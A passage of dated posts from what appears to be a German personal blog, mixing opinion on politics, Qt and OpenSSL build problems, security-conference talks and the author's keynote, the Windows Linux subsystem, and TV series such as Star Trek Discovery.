(Oh und Pro-Tipp für eure Twitter-Hetze: "der ist"-Argumente sind doof, "der hat das gemacht"-Argumente sind besser, und noch besser sind "der hat das gemacht"-Argumente mit Link. Ihr habt ja bei mir den Vorteil, dass ich Beweise gegen mich nicht lösche. Es gibt also eigentlich gar keine Ausreden dafür, ohne Link zu hetzen. Oder habt ihr etwa Angst, dass eure Leser eure Einschätzung der Eindeutigkeit der Lage nicht teilen könnten?)
Update: Nein, ihr könnt euch keine Alternativlos-Sendung erschleichen, indem ihr jetzt ein bisschen halbherzig Hass simuliert. Das muss schon glaubwürdig und über einen längeren Zeitraum stattgefunden haben. Mir schweibt da sowas hier vor nur ohne dass danach jemand einen Zeitungsbericht über die Lebensumstände der Hater schreibt.

Sat Nov 25 2017

[l] Zu dem Einsender mit der Referenz auf die Ponader-Geschichte kam noch eine faszinierende Einsendung rein.
zu Deinem «Stefan George»-Einsender, dessen Ergüsse ich in toto unkommentiert lassen möchte, eine kleie Anmerkung:
Er schreibt:
…als er die geschichte mit der grille erzählte, die musik machte während die fleißigen ameisen ihren bau mit vorräten füllten. eine geschichte mit der mir in meiner kindheit menschlichkeit und wertschätzung jeder tätigkeit beigebracht wurde…
Naja.
Diese Schilderung impliziert, daß am Ende die Ameisen die *Heuschrecke* (da wird die Assoziation doch gleich viel genauer, nicht?) aufnehmen. So kenne ich das eigentlich auch nur – und ich fand dieses Ende schon als Kind ungerecht, da die Heuschrecke die Arbeiter verspottet.
Nun, so geht die Geschichte nicht. Bei Äsop nicht, der sie erfunden hat, und bei Jean de La Fontaine nicht. Wikipedia.
Und woher kennen wir die Fabel mit dem für die Heuschrecke günstigen Ende? Von Walt Disney, der die "Moral" 1934 in einem Kurzfilm umdreht:
https://www.youtube.com/watch?v=3V9uL_ruafU
Und weswegen machte Disney das?
https://en.wikipedia.org/wiki/The_Ant_and_the_Grasshopper#Moral_and_artistic_debate
In the 20th century the fable enters the political arena. Walt Disney's cartoon version, The Grasshopper and the Ants (1934)[61] confronts the dilemma of how to deal with improvidence from the point of view of Franklin D. Roosevelt's New Deal. The Grasshopper's irresponsibility is underlined by his song "The World Owes us a Living", which later that year became a Shirley Temple hit,[62] rewritten to encase the story of the earlier cartoon. In the end the ants take pity on the grasshopper on certain conditions. The Queen of the Ants decrees that the grasshopper may stay, but he must play his fiddle in return for his room and board. He agrees to this arrangement, finally learning that he needs to make himself useful,…
Heißt also in Kurz: Jeder, der die Ameise und Grille-Fabel (eigentlich die Heuschrecke) nur in der Walt-Disney-Version kennt, ist bereits durch die us-amerikanische Wirtschaftplanung nach der Weltwirtschaftskrise kontaminiert. Der new deal hatte nämlich nur die Rettung der Marktwirtschaft zum Ziel – und jetzt kann man auch auflösen, wen die Heuschrecke personifizieren soll: Das kaputte Bankensystem.
P.S. Am Anfang des EN-Wikipedia-Artikels (der wieder um Längen genauer ist!), gibt es eine mißverständliche Äußerung am Anfang, daß die Ameisen die Bösen sind – das bezieht sich aber auf Metamorphosen und nicht auf die Fabel.
Faszinierend. Ich kannte nur die Äsop-Variante und wunderte mich schon über den Ponader-Spin.
Der Einsender fügt dann noch über Heuschrecken als Symbol folgendes hinzu:
Das mit der Heuschrecke als Bankensymbol interessiert vielleicht auch (nicht)? Jedenfalls ist das ein bißchen älter als der Heuschreckenvergleich von Müntefering.
Sir Thomas Gresham ist der Gründer der ersten Royal exchange (1565)…
und Wikipedia dazu
Aber auch auf der Martins Bank Limited gibt's den.
Und Müntefering war wahrscheinlich bibelbelesen. Buch Nahum 3,15–17 (bei Luther sind es Käfer); Ninive ist bei Nahum die große Hure, der gottlos die zerstörung angedroht wird:
Dann wird das Feuer dich fressen, / wird das Schwert dich vertilgen, / wird dich fressen wie ein Heuschreckenschwarm. Werde zahlreich wie die Heuschrecken, / zahlreich wie die Wanderheuschrecken! Du hast deine Händler zahlreicher gemacht / als die Sterne am Himmel. Die Heuschrecken häuten sich / und fliegen davon. Deine Wächter sind wie Wanderheuschrecken, / deine Beamten wie ein Schwarm von Heuschrecken, / die sich an den Mauern lagern an einem kalten Tag. Geht die Sonne auf, / so fliehen sie eilig davon. Man kennt ihren Ort nicht - / wo sind sie hin?
Faszinierend.

Thu Nov 23 2017

[l] Qt kann übrigens selbst in Version 5.9.2 nicht mit OpenSSL 1.1 gebaut werden.
OpenSSL 1.1 ist im August 2016 released worden.
Qt hat sich damit (bei mir) selbst ins Aus geschossen. Projekte, die nur mit Qt gehen, verwende ich dann halt nicht mehr. Viele sind das ja eh nicht.
Aber ich kann mich da echt nur wundern, dass die da so nachlässig sind, wenn nicht gar fahrlässig. Der alte OpenSSL-Kram wird ja nicht besser, der wird irgendwann nicht mehr supported und dann muss der Schritt eh gemacht werden.
Update: Es gibt da seit Mai (!) Code, aber den liefern sie noch nicht aus. Vielleicht in 5.10 dann. Seufz.
Update: Ich sehe gerade, dass openssh nicht mehr mit openssl 1.1 baut. Ich habe hier ein openssh mit openssl 1.1 gebaut und im Einsatz, aber jetzt checkt configure das und bricht den Build ab. WTF?
[l] Habt ihr gute Theorien dazu, wieso Bayern (also eigentlich ist es ja bloß der Großraum München) wirtschaftlich so gut läuft? Nach 4 Tagen Teilnahme am öffentlichen Nahverkehr bin ich gewillt, das (und die Verkehrsplanung generell) als vorteilhaften Faktor auszuschließen :-)
Es können auch nicht alles Steuergeschenke und Korruption der CSU sein, denn Bayern ist ja Netto-Geberland im Länderfinanzausgleich.
Ist es das angeblich so überlegene Schulsystem? Oder sind das vielleicht selbstverstärkende Effekte, wenn Reichtum weiteren Reichtum anzieht?
Ich hab jetzt nicht genug Einblick, um da Sachkompetenz bundeslandübergreifend beurteilen zu können, und ich würde auch nicht mit dem BER-Land Berlin vergleichen wollen, aber sagen wir mal mit NRW oder Sachsen oder Niedersachsen.
Update: Hier ist eine:
ein Grund der wirtschaftlichen Stärke des Großraums München und der relativen Schwäche Berlins dürfte in der deutsch-deutschen Teilung liegen. Viele große Unternehmen haben nach WW2 ihren Stammsitz in die Amerikanisch-Britisch-Französische Besatzungszone verlegt. Unter anderem haben nach 1945 die Allianz, Siemens und die Max-Planck-Gesellschaft (im Grunde aus der Kaiser-Wilhelm-Gesellschaft mit Sitz in Berlin hervorgegangen) ihren Hauptsitz von Berlin nach München verlegt.
Update: Andere Vorschläge: Ein Lehrer aus einem anderen Bundesland sagt, in Bayern hat der Lehrer am Ende der Grundschule das letzte Wort, ob das Kind aufs Gymnasium oder die Hauptschule kommt, und das würde dazu führen, dass am Gymnasium halt auch Schüler sind, die dem Stoff folgen können, und nicht die anderen ausbremsen. Das hielt der für einen so großen Faktor, dass er das Bildungsniveau in Bayern fast komplett darauf zurückführen würde.
Und ein anderer Einsender glaubt, die Bayern hätten frühzeitig in Atomkraftwerke investiert und damit den Strompreis soweit gesenkt, dass sie für Schwerindustrie attraktiv wurden, und die hat sie dann reich gemacht.
Faszinierend.

Sun Nov 19 2017

[l] Bei Wikileaks gibt es ja gerade Stunk, weil Trump Jr die Tweets veröffentlicht hat, die Julian ihm geschickt hat. Auf der einen Seite gibt es Stunk, weil sich Don Jr damit nicht ent- sondern eher belastet hat, aber auf der andere Seite ist das auch mal Gelegenheit für eine Abrechnung mit Wikileaks.
Hier macht das mal mein Kumpel Rop (auch schon zu Gast bei Alternativlos!) der damals bei dem Collateral Murder-Video mitgeholfen hatte, weil er an die Sache glaubte. Hier beschreibt er, wie sich sein Blick auf Wikileaks über die Jahre gewandelt hat.
Ich kann nicht sagen, dass mich die Tweets von Julian Assange an Don Jr jetzt groß gewundert haben. So ungefähr hätte ich mir das auch ausgemalt. Und ich kann auch menschlich verstehen, wieso Julian Assange lieber mit Donald Trump zusammenarbeiten wollte als mit Hillary Clinton, von der berichtet wurde, sie habe ihre Berater gefragt, wieso "wir den nicht einfach wegdrohnen". Dennoch hat die Organisation Wikileaks dadurch Schaden genommen und ist heute nur noch ein Schatten ihrer selbst. Und Julian Assange ist eher ein Fall für Promi-News, weil ihn Pamela Anderson besucht, als für echte News, weil Wikileaks irgendwas aufgedeckt hat.
Schon irgendwie schade. Da hätte echt was wichtiges draus werden können.

Mon Nov 6 2017

[l] Habt ihr euch auch gefragt, wo Twitter immer ihre Investoren her hatte? Die haben doch nie Gewinn gemacht, immer nur Geld verbrannt! Wer würde in so einem Laden investieren?
Nun, äh, Der Kreml natürlich! Die brauchten die noch.
Bonus: Über einen russischen Milliardär, der Beziehungen zu Jared Kushner pflegt.

Fri Oct 27 2017

[l] Hier gehen gerade einige Anfragen ein, ob ich die Folien meiner Keynote hochladen kann, und vielleicht auch die Keynote davor. Das wollte ich nicht machen, weil ich für die Keynotes meinen Stil etwas geändert habe.
Ich habe sonst immer alle inhaltlichen Punkte auch in Textform auf den Folien. Aber das hat halt auch Nachteile für den "Flow", weil man dann Gefahr läuft, nicht frei zu sprechen sondern vorzulesen.
Daher habe ich mir für die Keynotes vorgenommen, meinen Stil ein bisschen zu ändern, und habe auf mehreren Folien sowas wie "Anekdote: Foo Bar" stehen und erzähle dann die Anekdote frei. Das ist schöner für die Anwesenden, aber es macht halt die Folien unnütz. Ich überlege gerade, ob ich da eine Online-Version mache, wo dann mit kleiner Schriftgröße die Anekdote im Fließtext eingeblendet wird oder so. Schön ist das auch nicht. Eigentlich will man eine Aufzeichnung anhören. Und selbst in der Aufzeichnung werden einige Dinge nicht so gut rüberkommen wie bei dem Live-Event. Ich will das mal an einem Beispiel erläutern. Ich habe bei der Keynote gestern ein Wagnis gemacht, das auch voll nach hinten hätte losgehen können. Und zwar hatte ich als Eröffnung für die Keynote "Herzlich willkommen bei der konstituierenden Sitzung der Selbsthilfegruppe Sichere Software". Dann ein bisschen Einleitung und Exposition und dann ein "Ich bitte um Handzeichen: Wer hier hat schonmal vorsätzlich schlechte Software geschrieben (und ich meine jetzt nicht ein HACKME oder ein schlechtes Beispiel für ein Security-Buch)". Erwartungshaltung war: Null Hände gehen hoch. So war es auch.
Dann habe ich, dem Thema einer "Anonyme Alkoholiker"-Veranstaltung folgend, halt als erster angefangen mit dem Geständnis. Mein Beispiel war ping.c aus mininet. Das hatte in seiner initialen Form einen Textbook-Integer-Overflow drin, super exploitbar, alles prima. Den habe ich natürlich nicht übersehen, sondern ich habe den drin gehabt, weil das nicht als setuid gedacht war und für eine Boot-Floppy, auf der sich eh nur root einloggt, also keine Privilege Escalation, kein Bug. Kein Bug? Doch Bug! Mein Kumpel Ilja hat das gesehen und mich angefeixt und ich habe dann einen Fix eingecheckt. Das ist alles schon Jahre her, aber mein Punkt an der Stelle war: Nur weil es mehr oder weniger gute Ausreden gibt, macht es das ja nicht weniger zu einem Bug!
Meine nächste Folie hatte dann Beispiele, wie wir uns schlechte Software schönreden. Demonstrator! Mockup! Quick Hack! MVP! Nicht für den Produktivbetrieb! Prototyp!
Dann stellte ich die Frage nochmal: Bitte um Handzeichen: Wer hat hier schonmal vorsätzlich schlechte Software geschrieben, und es sich mit Euphemismen und Ausreden schöngeredet?
Und an dieser Stelle hätte das voll nach hinten losgehen können, aber das Publikum hat mitgespielt und es gingen über 80% der Hände hoch. Das wird man auf der Aufzeichnung bestimmt nicht sehen können. Und es ist natürlich der zentrale Drehpunkt von dem Vortrag gewesen, dass die Leute mir zustimmen, dass das, was sie so machen, schlecht ist.
Soweit ich weiß hat der Veranstalter ein Video gemacht, das man online stellen könnte. Ich muss da aber nochmal drübergehen, ob ich mich irgendwo verplappert habe und was rausgepiepst werden sollte, damit sich da niemand bloßgestellt fühlt oder so. Mir ging es ja explizit nicht darum, auf irgendjemanden mit dem Finger zu zeigen, sondern aufzuzeigen, dass wir alle Teil des Problems sind.

Thu Oct 26 2017

[l] Ich sitze gerade im Zug nach Hause von der Heise devsec und dachte mir, ich mache mal ein kleines Fazit. Da es drei Sessions parallel waren, konnte ich immer nur einen zur Zeit sehen und daher sind meine Beobachtungen hier nicht allgemeingültig. Aber mein Eindruck war, dass da mehrere Talks ihr Potenzial nicht erreichten. Ich habe mich trotzdem ganz gut unterhalten gefühlt, und ich erwarte da ja auch gar nicht, in jedem Talk faszinierende Neuigkeiten zu lernen, aber zumindest mal eine neue Perspektive auf einen Sachverhalt, das erwarte ich dann schon.
Es gab da z.B. einen Talk zu Owasp und deren Top 10, und der verbrachte gefühlt die erste halbe Stunde damit, dass die Top 10 ja völlig überbewertet und von der Werbung irgendwelcher Unternehmen missbraucht werden, dass das keine Pentest-Checkliste sei und nicht für Compliance gebraucht werden dürfe — und dann berichtete er darüber, wie sie da Streitereien haben zu den neuen Top 10, wie es da einen Entwurf gab, wo ein Punkt "du sollst Schlangenöl kaufen" eingefügt wurde. Anscheinend auf Betreiben von jemandem, der "privat" diese Liste maintaint und dann beruflich das geforderte Schlangenöl vertreibt. Das war mir alles neu, aber ich stalke jetzt auch nicht Owasp hinterher, die interessieren mich ehrlich gesagt nicht so stark. Aber jetzt zeigt er den neuen Entwurf, und da ist CSRF nicht mehr drin (nach wie vor eines der größten echten Probleme für Webapps, aus meiner Sicht, das viele viele Leute nicht verstanden haben, die Webapps bauen). Dafür ist da "du sollst Schlanenöl zum Monitoring und Alerting kaufen" drin. Tja, Owasp, ein Wort mit X. Das war wohl nix.
Was hab ich noch gesehen? Oh ja, "Sichere Softwareentwicklung - Anforderungen und Vorgehensweisen". Das war erst eine ewig lange Liste von "ALLE WURDEN GEHACKT! ALLE!!!", eine halbe Stunde "Wir werden alle störben" pur. Und als sie dann ein paar Maßnahmen empfahlen, machten wir ein Trinkspiel daraus und mein Kumpel Daniel drehte dann eine Siegerrunde, als er korrekt "gleich pluggen sie die SDL" vorhersagte.
Ich muss dazu sagen, dass ich relativ hohe Ansprüche habe bei Vorträgen, wenn es darum geht, was man da jetzt konkret mitnehmen kann. Und das fehlte hier bei vielen Talks. Ein paar Links auf Dinge (ich erinnere mich an drei Talks, die auf die Owasp Top 10 verwiesen, die der Owasp-Talk gerade dafür gedisst hatte). Ja, äh, wenn ich Links hinterherlaufen wollte, hätte ich mir den Vortrag nicht angucken müssen. Das Problem hatten viele Talks. Gut, die Materie ist ja auch komplex, aber das Argument kann ich nicht gelten lassen, wenn die erste Hälfte des Talks mit Platitüden und Einführungs-Blablah verplempert wird.
"Security im Entwicklerteam" habe ich auch geguckt, aber da fehlten mir auch so ein bisschen die "was machen wir denn jetzt"-Folien. Konkrete Dinge, die man jetzt tun kann, den Schritt geht irgendwie kaum jemand. Und ich meine jetzt nicht "hier ist ein Wiki, klick da mal rum". Besonders krass fand ich einen Talk am 2. Tag, bei dem es um Automatische Code-Scanner ging, und "was die Hersteller Ihnen nicht sagen werden". Da hätte ich konkrete Beispiele erwartet, mindestens aber ein paar lustige Anekdoten. Stattdessen kam unkonkretes "die versprechen viel und halten das dann nicht" (NEIN! Hold the presses!!) und "wenn Sie das genauer wissen wollen, dann holen sie sich mal die Eval-Versionen, nehmen Sie sich jeweils ein paar Tage Zeit, und testen Sie die gegeneinander". Äh, das wollte ich gerade nicht machen sondern mir hier die Ergebnisse abholen!
Am 2. Tag morgens gab es einen Vortrag, der mir vergleichsweise wichtig war. Da erzählten nämlich zwei Leute von Rohde & Schwarz von dem Projekt "Analyse und Auswahl einer allgemeinen Kryptobibliothek". Der Talk war mir wichtig, weil das Projekt für das BSI ist. Das BSI hat ja ein paar Glaubwürdigkeitsprobleme bei Kryptofragen, seit sie sich in die Bundestrojaner-Begutachtung haben verwickeln lassen. Insofern gut und richtig, das an eine externe Organisation rauszugeben. Aber Rohde & Schwarz ist an der Stelle eine zumindest aus meiner Sicht nicht viel glaubwürdiger aufgestellte Firma, die mir unter anderem als Lieferant von IMSI-Catchern für "Bedarfsträger" untergekommen ist bisher. Das ist keine gute Basis für das Erarbeiten einer unabhängigen Empfehlung für Krypto-Libraries. So und das Ergebnis von diesem Projekt war jetzt, dass sie Botan gewählt haben — eine Library mit einem Marktanteil von vielleicht 1% im TLS-Segment, von der kaum jemand überhaupt gehört hat. Ich habe mir bei Botan mal den Code angeguckt und der war jetzt nicht schlecht oder so, aber das ist ein krasser Außenseiter, und in Benchmarks ist deren Code schonmal nur halb so schnell wie der von OpenSSL. Meine Erfahrung ist, dass schon 5% Performanceunterschied reichen, um jemanden doch zu OpenSSL greifen zu lassen, wenn der bloß eine Ausrede suchte, wieso er bei OpenSSL bleiben soll. Das ist also alles schon mal nicht so gut, sowohl aus technischer als auch aus politischer Sicht. Ich hätte erwartet, dass die die Zeit nutzen, um mal so richtig knallhart inhaltlich zu zeigen, welche Kriterien ihnen wichtig waren und warum sie so entschieden haben, um jeden Geruch von Foul Play auszuschließen. Stattdessen kam ein Halbsatz dazu. Sie haben intern ein Punktesystem erarbeitet und nach dem sind sie gegangen. Ja, äh, das hilft mir jetzt nicht weiter. Das riecht jetzt nicht besser als vorher. Eines der Argumente gegen OpenSSL war, dass das API so schlimm ist. Ungefähr 20 Minuten lang haben sie dann Beispiele gezeigt, wie man in Botan Dinge tut, aber nicht Dinge wie "TLS-Verbindung aufmachen, Certificate Pinning anschalten" — nein, Dinge wie "SHA256 von diesen drei Bytes hier machen. Ja, äh, das geht auch in OpenSSL mit nur ein paar Zeilen Code. Das große Argument für Botan ist, dass es vergleichsweise wenig Code ist (im Vergleich zu OpenSSL). Allerdings kommt der viele Code in OpenSSL u.a. davon, dass sie für performancekritische Primitiven Assembler-Implementationen für ein Dutzend Plattformen haben. Und nicht nur für Performance ist Assembler wichtig, auch für das Vermeiden von Seitenkanälen. Wie da die Situation bei Botan ist, haben sie zwar gesagt, dass sie das getestet haben und was in einem Padding-Verfahren gefunden haben, aber was ist mit den anderen Verfahren? Die elliptischen Kurven, das RSA?
Zur Ehrenrettung der Vortragenden muss man aber sagen, dass die a) für eine Tochter von Rohde & Schwarz arbeiten, die die dazugekauft haben, und b) nicht den Eindruck erweckten, sie seien jetzt fiese Geheimdienstler, die unser Krypto schwächen wollen. Aber ausgeräumt haben sie den Verdacht halt auch nicht.
Mir tun die Leute beim BSI und bei dieser R&S-Tochter durchaus leid, versteht mich nicht falsch. Viele wenn nicht alle von denen meinen das sicher alles total gut, und werden jetzt völlig zu Unrecht verdächtigt.
Ich habe so ein bisschen den Eindruck gewonnen, dass ich mal einen Vortrag über Threat Modeling halten muss. Das ist gerade voll im Trend, und die meisten, die das machen, haben gar nicht verstanden, warum man das macht.
Das war dann für mich auch schon die Veranstaltung, danach kam meine Keynote und nach der bin ich ziemlich direkt in den Zug gestiegen, damit ich auf der Fahrt nach Berlin nicht komplett im Dunkeln fahren muss.
Update: Dirk, der den Owasp-Talk gemacht hatte, schreibt mir gerade, dass das nicht als Schlangenöl-Kaufen-Paragraph gemeint ist, auch wenn ich das so deute. Sie hätten extra auch Open Source erwähnt. Nun, mit Schlangenöl meine ich "verspricht Dinge, die es nicht halten kann", nicht "kostet Geld". Schlangenöl kostet natürlich im Allgemeinen auch Geld, ja, aber es gibt auch Open Source Schlangenöl. Ich finde es halt anstößig, erst die Formulierung von "wichtigste Angriffe" auf "wichtigste Risiken" zu ändern, um dann in der nächsten Runde "Reaktives Security-Produkt $XY nicht installiert" als Risiko hinzuschreiben. Das geht aus meiner Sicht gar nicht. Na mal gucken, ist ja bisher noch ein Release Candidate, vielleicht fliegt das ja auch noch raus.

Wed Oct 25 2017

[l] Ich sitze ja gerade bei der Heise Devsec in Heidelberg im Publikum und da gibt es (wie auf so vielen Konferenzen) einen Zielkonflikt bei der Zielgruppe. Richtet man sich eher an Einsteiger oder an Leute, die schon seit Jahren Security machen? Eher an Entwickler oder an die Projektleitung?
Während ich darüber nachdenke, frage ich mich gerade, wieso eigentlich niemand Vorführungen von Tools oder Methoden macht. Kein Vortrag, sondern eine Art Demo. Auf Youtube gibt es Live beim Software-Entwickeln zusehen. Ich könnte mir vorstellen, dass man das auch prima als Veranstaltung machen könnte. Aber halt mit vergleichsweise kleineren Zielen, damit sich das nicht stundenlang hinzieht.
Ich beobachte häufig, dass in Projekten Architekturentscheidungen gefällt werden, ohne dass man das irgendwie beurteilen kann, ob das eine gute Idee ist oder nicht. Da wird dann halt ein Tool angekauft, weil man gehört hat, dass das cool ist, oder dass man das heute halt so macht.
Und nicht nur Tools! Auch so Gottesdienst-Ritualdinge wie Agile oder SCRUM werden umgesetzt, ohne dass jemand im Team vorher schon eine richtige Vorstellung davon hat, was das eigentlich ist, was das bedeutet, warum man das macht.
Im Effekt sieht man dann, dass eigentlich gut gemeinte Dinge voll nach hinten losgehen. Security-Geräte stehen als Heizlüfter rum, fressen Strom und generieren Logs und Alerts, die keiner liest. Handbewegungen werden gemacht, weil man gehört hat, dass das dann besser ist, aber weil man gar nicht verstanden hat, wieso man das machen sollte, werden alle Nachteile aber keine der Vorteile mitgenommen.
Ich stelle mir gerade naiv vor, dass man das wegkriegen könnte, wenn man da Live-Demos hat. Aber nicht vom Hersteller, damit das nicht in Werbung ausartet, und auch nicht von irgendeinem User, sondern von jemandem, der sich richtig gut damit auskennt.
Wenn ich sehen kann, wie jemand mit einem bestimmten Tool ein bestimmtes Problem mit drei Handbewegungen gelöst kriegt, und ich ärgere mich da seit Wochen mit rum, dann wäre das doch eine wertvolle Information! Wertvoller jedenfalls als viele Vorträge, die im Moment auf Konferenzen Zeit verplempern (und das sage ich bewusst explizit ganz allgemein und meine nicht diese Konferenz im Speziellen).
Weiß jemand, wieso das nicht gemacht wird? Oder wird es gemacht, und ich hab es nicht mitgekriegt?
Update: Ein fieser Einsender erklärt es mir gerade so:
Aus meiner Erfahrung heraus sind Vorträge zum Kundengewinn gedacht und die von dir genannte "Live-Demo" wird als Schulung verkauft. Es wird öffentlich nicht gemacht, weil man das dann schlechter als "Anwenderschulung" noch beim Kunden verkauft bekommt.

Fri Oct 20 2017

[l] Ich schrieb vor Jahren diesen Aufruf, dass man meine Software bitte nicht nach Windows portieren soll.
Das gab übrigens, wie ihr euch sicher vorstellen könnt, einige interessante Gespräche mit Microsoft-Mitarbeitern, als ich da beruflich vor Ort war :-)
Jedenfalls hätte ich mir damals nicht träumen lassen, wenn ich meine Software nicht nach Windows portiere, dass Microsoft dann halt Windows zu meiner Software portieren würde. Das Windows Fall Creators Update kommt mit dem "Windows Subsystem for Linux". Das habe ich gerade mal ausprobiert und darin eines meiner dietlibc-Binaries gestartet, das ls von embutils. Das erste Binary, das ich probiert habe, segfaultete direkt. Also habe ich nochmal alles make clean gemacht, neu gebaut, das neue Binary mit Debug Info rüberkopiert, aufgerufen, und es tat einfach.
Jetzt bin ich ja doch ziemlich geflasht, muss ich euch sagen.
Das muss ich erstmal verdauen.

Fri Oct 13 2017

[l] Nach der Air-Berlin-Pleite haben sich viele gefragt, ob jetzt die Ticketpreise steigen werden.
Die FAZ hat mal den Lufthansa-Chef gefragt, und der hat geantwortet:
Für den Lufthansa-Vorstandsvorsitzenden Carsten Spohr ist indes ausgemacht, dass sich der Wettbewerb am Himmel noch verschärfen wird, obwohl die Marke Air Berlin verschwindet. Spohr rechnet sogar „mit grundsätzlich sinkenden Preisen“.
Aha. Ach so. Na gut.
Andererseits…
Die Lufthansa und ihre Töchter seien hoffnungslos mit der Bewältigung der Fluggastzahlen auf der Strecke Berlin–Köln–Berlin überfordert, berichtet der Vielflieger. Die Preise auf dieser Strecke hätten sich "im Vergleich zu Air-Berlin-Zeiten verzweifacht bis verdreifacht".
(Vorsicht: fiese, ungefragt losplärrende Autoplay-Videos)

Wed Oct 11 2017

[l] Wieso hat Rex Tillerson eigentlich Trump als "Moron" bezeichnet? Der muss ja etwas echt besonders dämliches gemacht haben. Also NOCH dämlicher als sonst!
Hier ist ein Gerücht dazu:
President Donald Trump wasn't happy with the steady decrease in the US stockpile of nuclear weapons since the 1960s.
So, over the summer, he asked instead for a tenfold increase in the US's nuclear weapons, NBC News reported on Wednesday, adding that the request startled his advisers and was followed soon after with Secretary of State Rex Tillerson calling him a "moron."

Tue Oct 10 2017

[l] Importiert hier jemand CSV-Dateien nach Excel?
Das kommt direkt mit Remote Code Execution als Feature!
Oh und stattdessen Google Sheets zu nehmen ist auch keine Lösung (duh!)

Sun Oct 8 2017

[l] Kennt ihr das? Ihr wollt Geld abheben, geht zur Bankfiliale, aber die ist gar nicht mehr da?
Seit 2000 haben über 10.000 Bankfilialen zugemacht. Das sind ungefähr ein Viertel. Tendenz steigend, wegen der Digitalisierung.
So und da haltet jetzt mal bitte mental gegen, dass die Banken gerade vermehrt Kontoführungsgebühren einführen. Hier z.B. die Postbank.

Fri Oct 6 2017

[l] Oha, die Kaspersky-Nummer ist noch geiler als es eh schon aussah! Der Typ, der für die NSA Malware entwickelt, hat auf seiner Kiste zuhause seine Malware gehabt, und da lief das Kaspersky-Zeugs, und der hat die Samples gesehen, die anscheinend verdächtig aussahen, und die in die Kaspersky-Cloud hochgeladen. Das ist ja auch genau seine Aufgabe an der Stelle, das wird auch so beworben. Und "die Russen" haben dann wohl gesehen, dass da interessante Scheiße bei ist und dem NSA-Malware-Fuzzi die Kiste aufgemacht und den Rest geklaut. MWAHAHAHA

Fri Sep 29 2017

[l] Star Trek Discovery ist übrigens nicht empfehlenswert, falls sich da jemand für meine Meinung interessiert :-)
Die scheißen einfach einmal komplett auf alles, was es bei Star Trek so an etablierten Regeln gibt, haben das Geld für die wissenschaftlichen Berater gespart und lieber in Lens Flare und CGI investiert (und die CGI sieht auch richtig geil aus, aber dafür guckt man ja nicht Star Trek). Da kommt dann schon mal eine Szene, wo ein Raumschiff, dessen Sensoren Lebenszeichen wegen eines Sturmes nicht erkennen können, dann durch den Sturm landet und die Personen identifiziert hat, weil die eine Figur in den Sand gemalt haben. Die Figur im Sand haben die Sensoren durch den Sandsturm gesehen, klar. Aber die Kommunikatoren der Personen nicht. Leuchtet ein. Die bei den Vulkaniern aufgewachsene Hauptfigur ist emotionaler als James T. "KHAAAAANNNNN!!!1!" Kirk und hat an einer Stelle sogar Tränen in den Augen und ist getriggert, äh, traumatisiert. Ein Klingone stürzt versehentlich in sein Bat'leth und ist tot. Überhaupt sehen die Klingonen aus wie "wir müssen noch Budget für die Make-Up-Artists verbrennen". Völlig absurd. Und natürlich noch schnell einen SJW-Subplot mit einem Albino-Klingonen eingebaut (nein, wirklich!), der von dem fiesen Patriarch... äh, von der fiesen Gesellschaft unterdrückt wird und sich dann in einer emotionalen Szene durch Abspulen von ein paar Platitüden Respekt erkämpfen kann. Ich weiß gar nicht, wo ich anfangen soll. An der Serie stimmt gar nichts. So richtig ganz doll schlecht. Könnt ihr euch sparen.
Oh und The Orville lohnt auch nicht. Ist ein Flachwitz-Festival, das voll und ganz davon lebt, Nostalgie-Gute-Laune bei Ü40-Trekkies auszulösen. Die Witze funktionieren zu vielleicht 1/5 oder 1/4 der Fälle. Nicht empfehlenswert.
Irgendwie sehen gerade alle Serien wie Marvel-Einheitsbrei aus. Alles auf Null Risiko ausgelegt. Troubled Hero fights against all odds, has to fight his inner demons along the way, finds out he had it in him the whole time. *Gähn*. Da kann ich auch tvtropes.com lesen.
Update: Der Fairness halber sollte ich sagen, dass die anderen Serien gerade auch alle so schlimm sind, dass Discovery nicht so stark heraussticht wie sich das jetzt anhört. Ich hatte noch Hoffnungen mit Dark Matter, aber das wurde gerade nach der 2. 3. Season gecancelt. Und The Expanse ist gerade zwischen Seasons. Das ist echt der einzige echte Lichtblick gerade.
Oh wo wir bei Fairness sind: Ich passe genau in das Beuteschema von The Orville und amüsiere mich dann doch heimlich und peinlich berührt über die paar Flachwitze, die nicht im Rohr krepieren.

Thu Sep 28 2017

[l] Das ist eine stressige Woche. Ich bin gerade in Brühl und soll heute die Keynote bei den Internet Security Days 2017 halten. Mal gucken, wie das läuft.
Keynotes sind ja eher nicht so mein Gebiet, ich mache lieber Technik oder Entertainment. Keynotes sind überhaupt eine sehr merkwürdige Art des Vortrags. Ich habe mir mal gezielt ein paar Keynotes angeguckt, um zu sehen, was da von mir erwartet wird, und das ist ein ganz eigenes Genre.
Ca ein Viertel sind so "I have a dream"-Visionen, auch partiell "We shall overcome" (hier ist ein Problem, aber wir schaffen das!1!!), die Hälfte sind so Marketing-Blablah-Geschichten und Selbstbeweihräucherung der Branche, und ein Viertel sind so "wir werden alle störben"-Doomsday-Warnungen.
Das ist alles nicht so mein Metier. Ich bin eher ein Freund von Gedankengängen mit Erkenntnisgewinn am Ende.
Wenn man sich populäre TED-Talks anguckt, dann sind die Gedankengänge von der Komplexität her immer auffällig auf Ernie-und-Bert-Niveau. Ich glaube, dass das System hat. Der Zuschauer wird nicht überfordert und kann sich bestätigen, dass er zu den oberen 50% gehört, weil er das alles schon vorher wusste. Ich habe beobachtet, dass auch immer die Vortragenden am populärsten sind, die non-threatening sind, und zwar im körperlichen wie auch im übertragenen Sinn. Wo man keine Angst haben muss, dass er Chef das sieht und sich denkt: Ich feuer meine Leute und stell lieber den ein.
Ach naja. Ich mach mir da immer viel zu viel Sorgen. Publikumsbeschimpfung geht immer. :-)
Update: Die Veranstaltung stellt sich gerade als im Wesentlichen eine Schlangenöl-Verkaufsevent heraus. Ich bin ja immer wieder fasziniert, wie die Leute "Ransomware zieht dir Geld aus der Tasche" klar unmoralisch finden, aber "Schlangenölbranche zieht dir Geld aus der Tasche" ist halt Kapitalismus.
Ein mir neuer Aspekt, der mich gerade echt flasht, ist dass die Sales-Drohnen jetzt ernsthaft mit folgender Argumentation rumlaufen: Durch die EU-Datenschutzverordnung drohen ja Strafen bis zu 4% des Jahresumsatzes. Also werden bestimmt auch die Malware-Leute anfangen, ihre Schutzgelder entsprechend hochzudrehen. Also sollten Sie das als drohenden Schaden sehen. Also müssen Sie jetzt auch soviel (oder zumindest "entsprechend mehr" Geld für unser Schlangenöl ausgeben.
Wie geil ist DAS denn?!
